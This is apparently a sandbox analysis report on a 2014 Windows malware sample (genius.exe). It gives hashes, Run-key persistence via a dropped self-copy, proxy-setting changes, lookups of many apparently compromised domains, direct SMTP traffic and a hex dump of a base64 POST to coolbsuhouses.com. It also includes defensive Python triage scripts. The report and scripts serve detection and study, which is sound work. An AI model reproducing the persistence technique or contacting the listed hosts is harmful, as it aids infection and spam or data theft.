Analysis Date: 2014-09-12 23:33:10
MD5: 24f91252356183c77b8d17e4342e52c0
SHA1: a615d1c975f5b11d66a5491d6b3e8acd25ef1c30

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 70d9acc42bbccbef7fd4d6e184baa939 sha1: 21349ea89a1ea84e5ffe0ab0462b14d61d214d3a size: 1024
Section .rdata md5: 3b7e67fb1ccbaf9bb4216814816e91ba sha1: a504a5735b53f6fc5724d26ba09482a9b5a539e1 size: 1024
Section .data md5: 8589a20c5b7c3de3ece563f3962530f5 sha1: a560db31a64b2cb913c2f420f09dd8019f05ca82 size: 1024
Section .rsrc md5: 3107e974ed3c2c6368c39ae6dd63397b sha1: ac3b63b9e76a9f9824ae365afbe43c27d7d3e39b size: 42496
Timestamp: 2014-06-30 05:04:01
Version:
LegalCopyright: Copyright (C) 2009
InternalName: genius
FileVersion: 8,2,3,23
ProductName: genius Application
ProductVersion: 2,3,3,22
FileDescription: genius Application
OriginalFilename: genius.exe
PEhash: 6e64e2bc7e9c5734cb990f59fdf8338784c8987d
IMPhash: f0855f86d5b3050322afa714b88b2ec1

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\wisaghavadti ➝ C:\Documents and Settings\Administrator\wisaghavadti.exe
Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\software\microsoft\windows\currentversion\AppManagement ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\nisekotourism[1].htm
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\coolbsuhouses[1].htm
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Crypto\RSA\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\a18ca4003deb042bbee7a40f15e1970b_666939c9-243b-475e-9504-51724db22670
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\leads.com[1].htm
Creates File: C:\Documents and Settings\Administrator\wisaghavadti.exe
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\americangeriatrics[1].htm
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\momsbestfriend[1].htm
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\eurofilms[1].htm
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\ocdburgos[1].htm
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\atre-ebisu-6fdental[1].htm
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\1banhope[1].htm
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\ylbrand[1].htm
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\ljecmetal.com.didtheyreadit[1].htm
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\oiler.com[1].htm
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\ocdburgos[1].htm
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\nisekotourism[1].htm
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\1banhope[1].htm
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\atre-ebisu-6fdental[1].htm
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\ylbrand[1].htm
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\ljecmetal.com.didtheyreadit[1].htm
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\coolbsuhouses[1].htm
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\leads.com[1].htm
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\americangeriatrics[1].htm
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\momsbestfriend[1].htm
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\eurofilms[1].htm
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\oiler.com[1].htm
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: wisaghavadti
Winsock DNS: gsprinters.com
Winsock DNS: americangeriatrics.org
Winsock DNS: kheldon.net
Winsock DNS: axisdanceshoes.com
Winsock DNS: ylbrand.com
Winsock DNS: oiler.com.pl
Winsock DNS: ingimex.com
Winsock DNS: ljecmetal.com.didtheyreadit.com
Winsock DNS: leads.com.my
Winsock DNS: eurofilms.com
Winsock DNS: sekretuspeha.com
Winsock DNS: 1banhope.com
Winsock DNS: fifthhousepr.com
Winsock DNS: greciahouse.it
Winsock DNS: atre-ebisu-6fdental.com
Winsock DNS: nisekotourism.com
Winsock DNS: coolbsuhouses.com
Winsock DNS: ocdburgos.org
Winsock DNS: momsbestfriend.com
Winsock DNS: 89gospel.com

Network Details:

DNS: smtp.glbdns2.microsoft.com (Type: A) ➝ 65.55.176.126
DNS: smtp.mail.us.am0.yahoodns.net (Type: A) ➝ 98.138.105.21
DNS: smtp.mail.us.am0.yahoodns.net (Type: A) ➝ 98.139.211.125
DNS: smtp.mail.us.am0.yahoodns.net (Type: A) ➝ 63.250.193.228
DNS: momsbestfriend.com (Type: A) ➝ 72.47.228.224
DNS: nisekotourism.com (Type: A) ➝ 64.207.186.185
DNS: coolbsuhouses.com (Type: A) ➝ 68.178.153.218
DNS: leads.com.my (Type: A) ➝ 208.91.198.111
DNS: eurofilms.com (Type: A) ➝ 85.92.85.168
DNS: americangeriatrics.org (Type: A) ➝ 198.154.232.208
DNS: ljecmetal.com.didtheyreadit.com (Type: A) ➝ 91.103.4.78
DNS: gsprinters.com (Type: A) ➝ 50.193.47.120
DNS: axisdanceshoes.com (Type: A) ➝ 64.5.41.209
DNS: smtp.live.com (Type: A)
DNS: smtp.mail.yahoo.com (Type: A)
DNS: ocdburgos.org (Type: A)
DNS: atre-ebisu-6fdental.com (Type: A)
DNS: kheldon.net (Type: A)
DNS: ylbrand.com (Type: A)
DNS: 1banhope.com (Type: A)
HTTP POST: http://coolbsuhouses.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Flows TCP: 192.168.1.1:1031 ➝ 65.55.176.126:25
Flows TCP: 192.168.1.1:1032 ➝ 98.138.105.21:25
Flows TCP: 192.168.1.1:1037 ➝ 68.178.153.218:80
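Triage pass over the runtime and network events above, added here as a worked example and not part of the sandbox's own report. The sample lines are constructed from this report (written as `Label: value`, one event per line, which is the report's layout rather than a real log format); the function names, rule names and the fan-out threshold are mine. It pulls out the behaviours a detection engineer would want from this run: a Run key that points at a file the sample itself wrote, a mutex named after that dropped file, direct TCP/25 connections together with the smtp.* names resolved, the number of unrelated domains looked up, and the HTTP POST target.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of the runtime/network events from the sandbox report above,
# one "Label: value" event per line. Paths and addresses are the ones the report lists.
EVENTS = r"""
Process: C:\malware.exe
Registry: HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\wisaghavadti ➝ C:\Documents and Settings\Administrator\wisaghavadti.exe
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\wisaghavadti.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\coolbsuhouses[1].htm
Creates Mutex: wisaghavadti
Creates Mutex: WininetConnectionMutex
Winsock DNS: gsprinters.com
Winsock DNS: americangeriatrics.org
Winsock DNS: kheldon.net
Winsock DNS: oiler.com.pl
Winsock DNS: ljecmetal.com.didtheyreadit.com
Winsock DNS: leads.com.my
Winsock DNS: coolbsuhouses.com
DNS: smtp.glbdns2.microsoft.com (Type: A) ➝ 65.55.176.126
DNS: smtp.mail.us.am0.yahoodns.net (Type: A) ➝ 98.138.105.21
DNS: smtp.live.com (Type: A)
DNS: smtp.mail.yahoo.com (Type: A)
HTTP POST: http://coolbsuhouses.com/
Flows TCP: 192.168.1.1:1031 ➝ 65.55.176.126:25
Flows TCP: 192.168.1.1:1032 ➝ 98.138.105.21:25
Flows TCP: 192.168.1.1:1037 ➝ 68.178.153.218:80
"""

RUN_KEY = re.compile(r"\\currentversion\\run\\", re.IGNORECASE)
FLOW = re.compile(r"^(\S+):(\d+) ➝ (\S+):(\d+)$")
FANOUT_THRESHOLD = 5  # assumption: my own cut-off for "many unrelated lookups in one run"


def parse_events(text):
    """Split each line at the first ': ' into (label, value); values keep any later colons."""
    events = []
    for line in text.strip().splitlines():
        label, _, value = line.partition(": ")
        events.append((label, value.strip()))
    return events


def triage(text):
    by = defaultdict(list)
    for label, value in parse_events(text):
        by[label].append(value)
    findings = {}

    # 1. Autorun persistence whose data is a path the sample itself created (self-copy + Run key).
    created = {v.lower() for v in by["Creates File"]}
    for value in by["Registry"]:
        key, _, data = value.partition(" ➝ ")
        if RUN_KEY.search(key) and data.lower() in created:
            findings["run_key_selfcopy"] = {"key": key, "target": data}

    # 2. A mutex that equals the dropped executable's name: a host-based infection marker.
    stems = {v.rsplit("\\", 1)[-1].lower()[:-4] for v in by["Creates File"] if v.lower().endswith(".exe")}
    findings["mutex_matches_drop"] = sorted(m for m in by["Creates Mutex"] if m.lower() in stems)

    # 3. Direct outbound SMTP (dst port 25) from a desktop process, plus the smtp.* names it resolved.
    smtp_dst = set()
    for value in by["Flows TCP"]:
        m = FLOW.match(value)
        if m and int(m.group(4)) == 25:
            smtp_dst.add(m.group(3))
    smtp_names = [v.split(" ", 1)[0] for v in by["DNS"] if v.startswith("smtp.")]
    findings["smtp_egress"] = {"destinations": sorted(smtp_dst), "resolved_smtp_names": smtp_names}

    # 4. Lookup fan-out: count of distinct names resolved through Winsock in this run.
    distinct = len(set(by["Winsock DNS"]))
    findings["dns_fanout"] = {"distinct_names": distinct, "flag": distinct >= FANOUT_THRESHOLD}

    # 5. HTTP POST targets, to pair with the raw request captured below.
    findings["http_posts"] = by["HTTP POST"]
    return findings
```

The self-copy rule deliberately requires both halves (a Run value and a matching Creates File), which keeps it quiet on legitimate installers that register a Run entry for a file they did not write during the same run; the SMTP rule keys on destination port 25 rather than on the resolved names, because the report shows the connections going to the MX addresses directly.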

Raw Pcap
0x00000000 (00000)   504f5354 202f2048 5454502f 312e310d   POST / HTTP/1.1.
0x00000010 (00016)   0a416363 6570743a 202a2f2a 0d0a4163   .Accept: */*..Ac
0x00000020 (00032)   63657074 2d4c616e 67756167 653a2065   cept-Language: e
0x00000030 (00048)   6e2d7573 0d0a436f 6e74656e 742d5479   n-us..Content-Ty
0x00000040 (00064)   70653a20 6170706c 69636174 696f6e2f   pe: application/
0x00000050 (00080)   6f637465 742d7374 7265616d 0d0a436f   octet-stream..Co
0x00000060 (00096)   6e74656e 742d4c65 6e677468 3a203439   ntent-Length: 49
0x00000070 (00112)   360d0a55 7365722d 4167656e 743a204d   6..User-Agent: M
0x00000080 (00128)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000090 (00144)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x000000a0 (00160)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x000000b0 (00176)   3b205356 31290d0a 486f7374 3a20636f   ; SV1)..Host: co
0x000000c0 (00192)   6f6c6273 75686f75 7365732e 636f6d0d   olbsuhouses.com.
0x000000d0 (00208)   0a436f6e 6e656374 696f6e3a 204b6565   .Connection: Kee
0x000000e0 (00224)   702d416c 6976650d 0a436163 68652d43   p-Alive..Cache-C
0x000000f0 (00240)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000100 (00256)   0d0a0d0a 39736a52 6e726561 54786866   ....9sjRnreaTxhf
0x00000110 (00272)   7a38414b 4a726a39 53774153 667a6874   z8AKJrj9SwASfzht
0x00000120 (00288)   5156784c 32374571 314b337a 59685832   QVxL27Eq1K3zYhX2
0x00000130 (00304)   58534835 44657177 674f5976 582b6b72   XSH5DeqwgOYvX+kr
0x00000140 (00320)   45726177 0d0a6633 61775561 7459534e   Eraw..f3awUatYSN
0x00000150 (00336)   4f547356 4d2f7a75 4b486e65 414a6745   OTsVM/zuKHneAJgE
0x00000160 (00352)   7767486f 7a304656 646d2b36 59586b35   wgHoz0FVdm+6YXk5
0x00000170 (00368)   4a653872 44424742 73534d4b 37574d6f   Je8rDBGBsSMK7WMo
0x00000180 (00384)   41575667 50770d0a 30456531 486c4462   AWVgPw..0Ee1HlDb
0x00000190 (00400)   4b577379 32513848 796f636b 4d36416f   KWsy2Q8HyockM6Ao
0x000001a0 (00416)   2f506b68 35417244 2b447030 4f6a3552   /Pkh5ArD+Dp0Oj5R
0x000001b0 (00432)   444f526b 55317765 36426d30 7566536b   DORkU1we6Bm0ufSk
0x000001c0 (00448)   55356178 6a52426d 0d0a4159 46364273   U5axjRBm..AYF6Bs
0x000001d0 (00464)   6f754c44 45475863 396a6b59 347a4167   ouLDEGXc9jkY4zAg
0x000001e0 (00480)   57477331 56543973 4f50494e 4f446435   WGs1VT9sOPINODd5
0x000001f0 (00496)   6c543475 48727733 465a6d70 36336631   lT4uHrw3FZmp63f1
0x00000200 (00512)   2f786142 44687633 4b450d0a 76444b74   /xaBDhv3KE..vDKt
0x00000210 (00528)   46332f43 56786868 3176706d 4f384e61   F3/CVxhh1vpmO8Na
0x00000220 (00544)   55333371 47533042 4a79644f 794b7065   U33qGS0BJydOyKpe
0x00000230 (00560)   446f6834 766e4f6c 54457074 722f4677   Doh4vnOlTEptr/Fw
0x00000240 (00576)   3136644a 6a394246 6a424870 0d0a5142   16dJj9BFjBHp..QB
0x00000250 (00592)   36535a5a 74634235 72497a61 416d664b   6SZZtcB5rIzaAmfK
0x00000260 (00608)   39756776 37575241 79373757 346d634e   9ugv7WRAy77W4mcN
0x00000270 (00624)   31496871 2f416e59 73574159 2b645561   1Ihq/AnYsWAY+dUa
0x00000280 (00640)   4a527651 6f504c4c 436a4559 37690d0a   JRvQoPLLCjEY7i..
0x00000290 (00656)   654a3879 434f4f2b 46485074 61557163   eJ8yCOO+FHPtaUqc
0x000002a0 (00672)   35514367 3373706f 42367650 4a62696d   5QCg3spoB6vPJbim
0x000002b0 (00688)   48477243 6c753369 56683536 6a7a574b   HGrClu3iVh56jzWK
0x000002c0 (00704)   336b317a 4b6f5957 4d734a75 47467367   3k1zKoYWMsJuGFsg
0x000002d0 (00720)   0d0a7162 6237352b 672b6d31 6844456d   ..qbb75+g+m1hDEm
0x000002e0 (00736)   354d6561 3364744f 47575858 4d376c48   5Mea3dtOGWXXM7lH
0x000002f0 (00752)   426e0d0a                              Bn..
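The consistency check a practitioner would want on the dump above, added here as a worked example (this script is not part of the sandbox's report). It rebuilds the bytes from the hex column, refuses a dump whose offsets are not contiguous, splits the HTTP request, confirms that the declared Content-Length (496) matches the captured body, and base64-decodes the CRLF-separated body lines. The hex dump is copied verbatim from the Raw Pcap section; the function names are mine. The body decodes cleanly to 360 bytes, but what those bytes encode is not established by this report.

```python
import base64
import re

# Hex dump copied from the "Raw Pcap" section of this report: offset, decimal offset, hex, ASCII.
RAW_PCAP = """\
0x00000000 (00000)   504f5354 202f2048 5454502f 312e310d   POST / HTTP/1.1.
0x00000010 (00016)   0a416363 6570743a 202a2f2a 0d0a4163   .Accept: */*..Ac
0x00000020 (00032)   63657074 2d4c616e 67756167 653a2065   cept-Language: e
0x00000030 (00048)   6e2d7573 0d0a436f 6e74656e 742d5479   n-us..Content-Ty
0x00000040 (00064)   70653a20 6170706c 69636174 696f6e2f   pe: application/
0x00000050 (00080)   6f637465 742d7374 7265616d 0d0a436f   octet-stream..Co
0x00000060 (00096)   6e74656e 742d4c65 6e677468 3a203439   ntent-Length: 49
0x00000070 (00112)   360d0a55 7365722d 4167656e 743a204d   6..User-Agent: M
0x00000080 (00128)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000090 (00144)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x000000a0 (00160)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x000000b0 (00176)   3b205356 31290d0a 486f7374 3a20636f   ; SV1)..Host: co
0x000000c0 (00192)   6f6c6273 75686f75 7365732e 636f6d0d   olbsuhouses.com.
0x000000d0 (00208)   0a436f6e 6e656374 696f6e3a 204b6565   .Connection: Kee
0x000000e0 (00224)   702d416c 6976650d 0a436163 68652d43   p-Alive..Cache-C
0x000000f0 (00240)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000100 (00256)   0d0a0d0a 39736a52 6e726561 54786866   ....9sjRnreaTxhf
0x00000110 (00272)   7a38414b 4a726a39 53774153 667a6874   z8AKJrj9SwASfzht
0x00000120 (00288)   5156784c 32374571 314b337a 59685832   QVxL27Eq1K3zYhX2
0x00000130 (00304)   58534835 44657177 674f5976 582b6b72   XSH5DeqwgOYvX+kr
0x00000140 (00320)   45726177 0d0a6633 61775561 7459534e   Eraw..f3awUatYSN
0x00000150 (00336)   4f547356 4d2f7a75 4b486e65 414a6745   OTsVM/zuKHneAJgE
0x00000160 (00352)   7767486f 7a304656 646d2b36 59586b35   wgHoz0FVdm+6YXk5
0x00000170 (00368)   4a653872 44424742 73534d4b 37574d6f   Je8rDBGBsSMK7WMo
0x00000180 (00384)   41575667 50770d0a 30456531 486c4462   AWVgPw..0Ee1HlDb
0x00000190 (00400)   4b577379 32513848 796f636b 4d36416f   KWsy2Q8HyockM6Ao
0x000001a0 (00416)   2f506b68 35417244 2b447030 4f6a3552   /Pkh5ArD+Dp0Oj5R
0x000001b0 (00432)   444f526b 55317765 36426d30 7566536b   DORkU1we6Bm0ufSk
0x000001c0 (00448)   55356178 6a52426d 0d0a4159 46364273   U5axjRBm..AYF6Bs
0x000001d0 (00464)   6f754c44 45475863 396a6b59 347a4167   ouLDEGXc9jkY4zAg
0x000001e0 (00480)   57477331 56543973 4f50494e 4f446435   WGs1VT9sOPINODd5
0x000001f0 (00496)   6c543475 48727733 465a6d70 36336631   lT4uHrw3FZmp63f1
0x00000200 (00512)   2f786142 44687633 4b450d0a 76444b74   /xaBDhv3KE..vDKt
0x00000210 (00528)   46332f43 56786868 3176706d 4f384e61   F3/CVxhh1vpmO8Na
0x00000220 (00544)   55333371 47533042 4a79644f 794b7065   U33qGS0BJydOyKpe
0x00000230 (00560)   446f6834 766e4f6c 54457074 722f4677   Doh4vnOlTEptr/Fw
0x00000240 (00576)   3136644a 6a394246 6a424870 0d0a5142   16dJj9BFjBHp..QB
0x00000250 (00592)   36535a5a 74634235 72497a61 416d664b   6SZZtcB5rIzaAmfK
0x00000260 (00608)   39756776 37575241 79373757 346d634e   9ugv7WRAy77W4mcN
0x00000270 (00624)   31496871 2f416e59 73574159 2b645561   1Ihq/AnYsWAY+dUa
0x00000280 (00640)   4a527651 6f504c4c 436a4559 37690d0a   JRvQoPLLCjEY7i..
0x00000290 (00656)   654a3879 434f4f2b 46485074 61557163   eJ8yCOO+FHPtaUqc
0x000002a0 (00672)   35514367 3373706f 42367650 4a62696d   5QCg3spoB6vPJbim
0x000002b0 (00688)   48477243 6c753369 56683536 6a7a574b   HGrClu3iVh56jzWK
0x000002c0 (00704)   336b317a 4b6f5957 4d734a75 47467367   3k1zKoYWMsJuGFsg
0x000002d0 (00720)   0d0a7162 6237352b 672b6d31 6844456d   ..qbb75+g+m1hDEm
0x000002e0 (00736)   354d6561 3364744f 47575858 4d376c48   5Mea3dtOGWXXM7lH
0x000002f0 (00752)   426e0d0a                              Bn..
"""

# Offset, "(decimal)", then up to four 4-byte hex groups; the ASCII column is never captured.
DUMP_LINE = re.compile(r"^0x([0-9a-f]{8}) \(\d+\)\s+((?:[0-9a-f]{8} ){0,3}[0-9a-f]{2,8})")


def parse_hexdump(text):
    """Rebuild the bytes; each line's offset must equal the bytes seen so far (catches dropped lines)."""
    out = bytearray()
    for line in text.splitlines():
        m = DUMP_LINE.match(line)
        if not m:
            continue  # blank or non-dump lines are skipped
        if int(m.group(1), 16) != len(out):
            raise ValueError(f"dump not contiguous at {m.group(1)}")
        out += bytes.fromhex(m.group(2).replace(" ", ""))
    return bytes(out)


def parse_http_request(raw):
    """Split one HTTP/1.x request into request line, lower-cased header map and body."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("request has no end-of-headers marker")
    lines = head.decode("ascii").split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for h in lines[1:]:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers, "body": body}


def decode_body(body):
    """Body is base64 text in CRLF-separated lines; validate=True rejects bytes outside the alphabet."""
    return base64.b64decode(body.replace(b"\r\n", b""), validate=True)


def analyse(text=RAW_PCAP):
    req = parse_http_request(parse_hexdump(text))
    declared = int(req["headers"].get("content-length", "-1"))
    return {
        "method": req["method"],
        "host": req["headers"].get("host"),
        "user_agent": req["headers"].get("user-agent"),
        "declared_length": declared,
        "body_length": len(req["body"]),
        "complete": declared == len(req["body"]),
        "decoded_length": len(decode_body(req["body"])),
    }
```

Because the body length equals the declared Content-Length, the capture holds the whole POST; a shorter body would mean the sandbox cut the flow and the decoded blob would be truncated as well. The User-Agent string in the request is the one the report lists above, so it is a usable (if weak) network indicator alongside the Host header.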


Strings

041904b0
2,3,3,22
8,2,3,23
absolutely
accordingly exactly
adore pregnant ashamed
&always
&and--always surrender
apparently better
&appealed anything
beauty fruition windows
because people
Behind
between
&brute Elizabethan
business
Carr?? tenderness
church
&clever
completely
complying geography present
consider London sense casual
contained
Copyright (C) 2009
costume morrow
counted
cousins appearance
Dashwood
decent
demanded interesting
&desultory completely
different seeing
discomfort
distinctness seeing
document pittore
effect feelings
encourage brush
entanglements
everything
exclaim personage reason Peter2moment fairest elected haunted things Carr?? words
expressed sociable
FileDescription
FileVersion
genius
genius Application
genius.exe
gentlemen disappointment old-fashioned paint
greeted painter return gesture
happened
hard--it somewhere again
&her--he
holiday
Hoppuss observe yours speaking
&INDEMNITY
interlocutor
InternalName
&irritation
judged cousins--their
&knowledge
&knowledge intimacy;
least
LegalCopyright
&leisure spoken
&lovely
manners elements
&married triumph
matrons
method remember
moment
month bazaar
mother cleared
mother theatre Shakespeare
MS Shell Dlg
&opined
OriginalFilename
&other manifestation
otherwise
panels
people unmolested
Peters
&possibilities
ProductName
ProductVersion
&profanity that--he
&profit wished
&proved simple
public
question
quickly
&rather mother
&really
receiving London creations
&revelations magnificently
RichEdit20A
&Rosedale
'Rosedale things custom minute professed
&sentiment
+should ambitions--tremendous talked bargain%daughter say--Nick particular freedom
sitting
smiling stared;
&sort--I
statutes
Still
StringFileInfo
studio
&studio
sufficient things feared
SysListView32
Tahoma
theatre
&things
things brightly
&thought laughed
to-day
toward there sister inconsistent
Translation
travelled trifler
truths
turned
VarFileInfo
vision
visit presumably
volition(though particular vague moreover thought'lighter mirror everything on--in critic
voracity derive dropped strictness
VS_VERSION_INFO
weaken myself
whether
wonderful
would Calcutta
&would individually
wounds; Dormer
&write
0]0x=f
2^fdm0B
3#BPmy
5}`DYo
5y&lD('
8L+.xL
ADUOXYVW
AsTsA`1
BG`;GM
BnR8E~
clZuS\Z
+CnnIK<
CreateWindowExA
cv?@K%C
@.data
DefWindowProcA
deg	<?fW
Dg_GX1
DispatchMessageA
dv!g<t
'.+D)x
edh$#B
F9r<jP
FindResourceA
)<!FPq
:g1f_V&
gatFFwewqyt qwje
GetCurrentThreadId
GetMessageA
GetModuleHandleA
GetProcessHeap
gMd*K,
gS"'SE
,#]$H"c%$
HeapAlloc
im{*[73
J|lb"K"
K08M3<
kernel32.dll
KillTimer
lAb|VT
LoadCursorA
LoadIconA
LoadResource
@nCn-k6M%
:NCT=eO
nKj[Vl
NNA|!S
OM\\MOzvS! 0
~O:q` 
PostQuitMessage
*=pSb$
 	p%W"
P(+(zM
rCy0s<
`.rdata
Rd	(FK3
RegisterClassExA
-SDMHB
SetTimer
ShowWindow
svchost
t3y-cu
/t{69T
!This program cannot be run in DOS mode.
TranslateMessage
TS>0<y
TwxKz!
[U<K(s
UpdateWindow
user32.dll
!v5%1J
|$vWa/r
-.Wb}$
"x3a'N
{~~_Yx